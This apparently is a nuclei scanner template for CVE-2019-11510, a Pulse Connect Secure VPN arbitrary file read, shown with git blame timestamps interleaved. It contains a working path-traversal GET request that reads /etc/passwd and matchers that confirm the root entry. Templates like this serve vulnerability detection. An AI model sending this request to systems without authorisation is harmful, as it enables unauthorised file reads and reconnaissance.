nuclei-templates/cves/CVE-2019-11510.yaml

22 lines
558 B
YAML
Raw Normal View History

2020-04-22 06:42:01 +00:00
id: CVE-2019-11510
info:
name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
author: organiccrap
severity: high
# https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
2020-05-25 07:49:06 +00:00
2020-04-22 06:42:01 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
matchers-condition: and
2020-04-22 06:42:01 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2020-04-22 06:42:01 +00:00
- type: regex
regex:
2020-05-25 07:49:06 +00:00
- "root:[x*]:0:0:"
2020-04-22 06:42:01 +00:00
part: body